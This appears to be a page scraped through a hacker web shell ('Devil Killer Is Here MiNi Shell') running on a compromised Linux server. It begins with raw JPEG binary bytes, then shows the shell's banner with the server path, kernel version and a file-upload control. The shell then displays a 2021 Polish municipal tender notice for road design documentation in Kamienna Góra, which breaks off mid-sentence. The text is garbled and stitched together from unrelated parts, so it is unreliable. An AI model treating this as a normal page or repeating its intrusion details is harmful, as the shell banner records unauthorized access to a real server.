JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210423/0003917302-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00039173 z dnia 2021-04-23</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej dla budowy drogi w ul. Wrzosowej w Kamiennej Górze </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Kamienna Góra</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821316</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Grunwaldzi 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kamienna Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">756455110</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@kamiennagora.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kamiennagora.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej dla budowy drogi w ul. Wrzosowej w Kamiennej Górze </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b8889895-a40a-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00039173</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007582/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.17 Opracowanie dokumentacji projektowej dla przebudowy i remontu ul. Wrzosowej w Kamiennej Górze</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazkupowa.pl/kamiennagora <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający będzie komunikował się z Wykonawcami za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/kamiennagora.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/kamiennagora. 2. Komunikacjamiędzy Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia orazinformacje, przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl iformularza „Wyślij wiadomość do Zamawiającego”. Za datę przekazania (wpływu)oświadczeń,wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłaniazapośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość doZamawiającego”, po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.3. Zamawiający przekazuje Wykonawcom informacje w formie elektronicznej zapośrednictwemplatformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmianyspecyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający zamieszcza na platformie w sekcji„Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretnyWykonawca,przekazywana jest w formie elektronicznej za pośrednictwem platformazakupowa.pl dokonkretnego Wykonawcy. 4. Zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagańtechnicznych dladokumentów elektronicznych oraz środków komunikacji elektronicznej wpostępowaniu o udzielenie zamówienia publicznego lub konkursie, Zamawiający określa niezbędnewymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: 1) stały dostępdo sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, 2) komputer klasy PC lubMAC onastępującej konfiguracji: pamięć min. 2 GBRam, procesor Intel IV 2 GHZ lub jego nowszawersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja10 0., 4) włączona obsługa JavaScript, 5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, 6) Platformazakupowa.pl działa według standardu przyjętego wkomunikacji sieciowej- kodowanie UTF8, 7) oznaczenie czasu odbioru danych przez platformęzakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwerasynchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający zgodnie z art. 13 ust. 1 i 2 rozporządzeniaParlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osóbfizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takichdanych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UEL119 z 04.05.2016, str. 1), dalej „RODO”, informuje że: 1.1. administratorem Pani/Pana danychosobowych jest: Gmina Miejska Kamienna Góra reprezentowana przez Burmistrza Miasta KamiennaGóra z siedzibą w Kamiennej Górze (58-400) przy Placu Grunwaldzkim 1; 1.2. z administratoremmożna się skontaktować poprzez adres e-mail: iod@kamiennagora.pl lub pisemnie na adres siedzibyadministratora; 1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODOw celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego; 1.4. odbiorcamiPani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacjapostępowania w oparciu o art. 74 ustawy z dnia 11 września2019 r. – Prawo zamówień publicznych(Dz. U. z 2019 r. poz. 2019 ze zmianami), dalej „Ustawa”; 1.5. Pani/Pana dane osobowe będąprzechowywane, zgodnie z art. 78 ust. 1 Ustawy, przez okres 4 lat od dnia zakończenia postępowaniao udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywaniaobejmuje cały okres obowiązywania umowy; 1.6. obowiązek podania przez Panią/Pana danychosobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym wprzepisach Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; 1.7.w odniesieniu do Pani/Pana danych osobowych decyzje nie będąpodejmowane w sposóbzautomatyzowany, stosowanie do art. 22 RODO. 2. Posiada Pani/Pan: 2.1. na podstawie art. 15RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; 2.2. na podstawie art. 16 RODOprawo do sprostowania Pani/Pana danych osobowych; 2.3. na podstawie art.18 RODO prawo żądaniaod administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, októrych mowa w art. 18 ust. 2 RODO; 2.4. prawo do wniesienia skargi do Prezesa Urzędu OchronyDanych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczącychnarusza przepisy RODO; 3. Nie przysługuje Pani/Panu: 3.1. w związku z art. 17 ust. 3 lit. b, d lub eRODO prawo do usunięcia danych osobowych; 3.2. prawo doprzenoszenia danych osobowych, októrym mowa w art. 20 RODO; 3.3. na podstawie art. 21 RODO prawo sprzeciwu, wobecprzetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danychosobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZIF.271.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 46230,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej i kosztorysowej dlabudowy drogi w ul. Wrzosowej w Kamiennej Górze, o długości ok. 785 m wraz z odwodnieniemoraz przebudową skrzyżowań. Dokumentacja projektowa i kosztorysowa winna obejmować:1.budowę drogi (jezdnia, placyki manewrowe – nawierzchnia asfaltowa, chodniki – nawierzchnia zkostki betonowej) wraz z odwodnieniem oraz włączeniem do dróg istniejących (skrzyżowania),2.uwzględnienie planowanych zjazdów na nieruchomości przyszłej zabudowy jednorodzinnej,3.uwzględnienie w opracowanej dokumentacji projektu budowy sieci wodociągowej ikanalizacyjnej, dotyczącego uzbrojenia terenu przyszłej zabudowy mieszkaniowejjednorodzinnej (dokumentacja projektowa budowy sieci stanowi załącznik nr 2),4. budowę siecideszczowej w zakresie odwodnienia drogi z lokalizacją studni, umożliwiających przyszłeprzyłączenie do sieci deszczowej przykanalików z nieruchomości przeznaczonych podzabudowę jednorodzinną,5. uwzględnienie w opracowaniu projektowym istniejącego rowu odwadniającego w działce nr 644/2 i zaprojektowanie jego przebudowy w sposób niekolidujący z planowanym układem drogowym i podziałami geodezyjnymi nieruchomości przeznaczonych pod zabudowę jednorodzinną. Proponuje się również wykorzystanie rowu w systemie odwodnienia terenu. Założenia przebudowy rowu wraz z możliwą zmianą jego trasy powinny wskazywać również konieczne obszary i ilości niwelacji przyległych terenów w celu zapewnienia odpowiedniego odprowadzenia wód;6. uwzględnienie rezerwy terenu dla ułożenia linii elektroenergetycznejzasilającej budynki przyszłej zabudowy jednorodzinnej,7. budowę oświetlenia drogowego,8.projekt budowy kanału technologicznego - jeżeli zajdzie taka konieczność,9. opracowaniedotyczące gospodarki zielenią, w tym:a. inwentaryzację istniejącej zieleni i projekt planowanejwycinki lub korekty drzew i krzewów,b. opracowanie projektu nowych nasadzeń, pasów zieleni,skwerków itp.,10. ocenę stanu technicznego istniejących przepustów (przy drodze i pod drogą) iw razie potrzeby projekt ich przebudowy lub wskazanie koniecznych napraw i remontów,11.projekt docelowej organizacji ruchu – oznakowanie pionowe i poziome dróg.Założenia ogólne dozakresu dokumentacji projektowej: 1. Dokumentacja projektowa powinna posiadać wszystkieniezbędne uzgodnienia i opinie, celem złożenia wniosku o pozwolenie na budowę lub dokonaniazgłoszenia zamiaru wykonania robót budowlanych właściwemu organowi architektoniczno budowlanemu.Dokumentacja ma uwzględniać rozwiązania techniczne przebudowy dróg wdowiązaniu do istniejących odcinków. Kilometraż projektowanych dróg powinien być zgodny zkierunkiem przebiegu dróg wyższego rzędu.2. Należy przewidzieć przebudowę skrzyżowań zistniejącą siecią drogową w zakresie koniecznych korekt geometrii oraz robót nawierzchniowychwraz z uzgodnieniami z innymi zarządcami dróg.3. Należy przewidzieć budowę zjazdów wraz zeznajdującymi się pod nimi przepustami (w projekcie należy umieścić zestawienie wszystkichzjazdów wraz z podaniem ich pochylenia podłużnego, kilometrażu drogi w osi zjazdu,oznaczenia której strony drogi dotyczy, istniejących i projektowanych wymiarów w tym ichpowierzchni oraz istniejącego i projektowanego rodzaju nawierzchni) i uwzględnić zjazdyistniejące.4. Jeżeli zajdzie konieczność wynikająca z obowiązujących przepisów technicznych,przewidzieć należy budowę kanałów technologicznych lub przedstawić uzgodnienie o brakutakiego wymogu.5. Dokumentacja projektowa musi uwzględniać budowę lub przebudowęsystemów odwodnienia drogi.6. Należy przewidzieć przebudowę lub rozbudowę istniejącejinfrastruktury technicznej kolidującej z przyjętymi rozwiązaniami projektowymi oraz uzyskanie iuzgodnienie warunków usunięcia wszelkich kolizji z infrastrukturą techniczną - jeżeli zajdzie takakonieczność.7. Zamawiający nie przewiduje realizacji robót na nieruchomościach niestanowiących pasów drogowych projektowanych dróg.8. Wykonawca dokumentacji projektowejzobowiązany jest do sporządzenia i uzyskania zatwierdzenia przez organ właściwy dozarządzania ruchem drogowym, projektu stałej organizacji.9. Jeżeli zajdzie taka konieczność wodniesieniu do przepisów Prawa wodnego, należy uzyskać wymagane pozwolenia/zgodywodnoprawne wraz z przygotowaniem materiałów np. operatów, ocen stanowiących załącznikdo wniosku o uzyskanie pozwoleń/ zgód wodnoprawnych lub zgłoszeń na wykonanie urządzeńjak i korzystanie ze środowiska.10. Należy również uzyskać decyzję o środowiskowychuwarunkowaniach, jeżeli zajdzie taka konieczność, wynikająca z obowiązujących przepisów.Do obowiązków Wykonawcy należy:a) Opracowanie dokumentacji projektowo – kosztorysowejzgodnie z obowiązującym prawem, w tym przepisami techniczno – budowlanymi oraz zasadamiwiedzy technicznej w normami;b) Opracowanie dokumentacji projektowej i kosztorysowej przyzastosowaniu najkorzystniejszych rozwiązań technicznych i ekonomicznych;c) Wizja lokalna;d)Uzyskanie mapy do celów projektowych w wymaganym zakresie;e) Uzyskanie warunkówtechnicznych i uzgodnień w zakresie niezbędnym do opracowania projektów sieci deszczowejlub przebudowy innych sieci w przypadku kolizji oraz projektów dróg, zjazdów i włączeń doplanowanych i istniejących ciągów komunikacyjnych;f) Uzyskanie wszelkich kompletnych danychwyjściowych i uzgodnień do opracowania dokumentacji projektowej i kosztorysowej;g)Ponoszenie wszelkich kosztów związanych z opracowaniem dokumentacji i innych niezbędnychopracowań w tym kosztów zakupu map do celów opiniodawczych, do celów projektowych,wypisów i wyrysów z ewidencji gruntów, kosztów uzyskania uzgodnień, opinii, decyzji itp.;h)Uzyskanie w niezbędnym zakresie wszelkich wymaganych uzgodnień branżowych;i) Uzyskanieopinii geotechnicznej;j) Wykonanie projektu rozwiązania kolizji z urządzeniami podziemnymi wprzypadku, gdy takie wystąpią;k) Uzyskanie pozytywnego uzgodnienia z narady koordynacyjnejZUD (Wydział Geodezji Starostwa Powiatowego w Kamiennej Górze);l) Uzyskanie pozwoleniawodnoprawnego/zgody wodnoprawnej, jeżeli dla przyjętych rozwiązań projektowych będzie onowymagane przepisami prawa;m) Opracowanie kosztorysów inwestorskich i specyfikacjitechnicznych wykonania i odbioru robót dla zakresu prac wynikających z projektubudowlanego;n) Opracowanie i uzgodnienie projektu organizacji ruchu (znaki pionowe ipoziome);o) Dostarczenie opracowanej dokumentacji w postaci elektronicznej i papierowej;p)Współdziałanie z Zamawiającym w toku postępowania o wydanie pozwolenia na budowę, wzakresie wynikającym z obowiązków projektanta w rozumieniu ustawy Prawo budowlane;q)Złożenie, z upoważnienia Zamawiającego, wniosku o pozwolenie na budowę/zgłoszenia robótbudowlanych wraz z załącznikami stanowiącymi wymaganą ilość egzemplarzy dokumentacjiprojektowej;r) Uzupełnienie braków do złożonego wniosku o wydanie decyzji pozwolenie nabudowę/zgłoszenia robót budowlanych;s) Niezwłoczne i nieodpłatne udzielania Zamawiającemuwyjaśnień do przedmiotu umowy na etapie organizowania przetargu na wybór wykonawcy robótbudowlanych oraz w trakcie trwania procedury przetargowej, tzn. w terminie nie dłuższym niż 48godzin od momentu otrzymania zapytań od Zamawiającego pocztą elektroniczną lub faksem.Odpowiedzi udzielane będą w pierwszej kolejności pocztą elektroniczną, następnie faksem lubw formie pisemnej;t) Informowanie Zamawiającego o problemach lub okolicznościach mogącychwpłynąć na jakość lub termin zakończenia wykonania opracowań projektowych i innych pracbędących przedmiotem umowy;u) Ponoszenie pełnej odpowiedzialności za błędy projektowe,które zostaną stwierdzone w opracowanym dokumencie. Uzgodnienie przedmiotu umowy przezZamawiającego nie zwalnia Wykonawcy od odpowiedzialności za błędy ujawnione po odbiorzedokumentacji oraz w trakcie realizacji robót budowlanych. W przypadku stwierdzenia błędówobowiązkiem Wykonawcy będzie ich niezwłoczne poprawienie własnym kosztem i staraniem;v)Sprawowanie nadzoru autorskiego;w) Przedkładanie na adres e-mail:andrzej.cieslik@kamiennagora.pl raportów miesięcznych z postępu wykonania opracowańprojektowych w formie pisemnej. Raport miesięczny ma na celu kontrolę prac projektowych,informowania o problemach w wykonywaniu dokumentacji, zwłoce w uzyskaniu warunkówtechnicznych, opinii, decyzji i innych problemach rzutujących na wykonanie przedmiotu Umowy.Wykonawca ma obowiązek w pierwszym tygodniu każdego miesiąca dostarczyćZamawiającemu raport miesięczny w odniesieniu do ostatniego dnia poprzedniego miesiąca.Raport musi zawierać plan pracy na kolejny miesiąc, analizę planowanych i zrealizowanychzałożeń z poprzedniego miesiąca, informację o napotkanych problemach, a w przypadkuopóźnień/zwłoki z uzasadnieniem opóźnień/zwłoki oraz wszystkie inne wymagania określone wprojektowanych postanowienia umowy (Załącznik nr 8 do SWZ). Uwaga: W przypadku gdybudowa obiektów wymagała będzie odrębnej decyzji pozwolenia na budowę lub zgłoszeniazamiaru wykonania obiektów lub robót budowlanych, Wykonawca zobowiązany jest douzyskania tych decyzji - wynagrodzenie z tego tytułu skalkulowane winno być w ofercie.JeśliProjektant uzna, że dla realizowanego przedsięwzięcia nie jest wymagane, zgodnie zobowiązującymi przepisami, uzyskanie określonych wyżej decyzji, pozwoleń, należy dołączyć do dokumentacji opinię organu właściwego dla wydania przedmiotowej decyzji lub wyjaśnienieprzywołujące odpowiednie przepisy, potwierdzające brak konieczności ich uzyskania.Załącznikido opisu przedmiotu zamówienia stanowią:1. Załącznik nr 1 – mapa z zakresem budowy drogi.2.Załącznik nr 2 – dokumentacja projektowa budowy sieci wodno-kanalizacyjne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71300000-1 - Usługi inżynieryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie minimalnego okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące zdolności technicznej lub zawodowej. Wykonawca spełni warunek, jeżeli wykaże, że:a)	Dysponuje co najmniej 1 osobą posiadającą uprawnienia 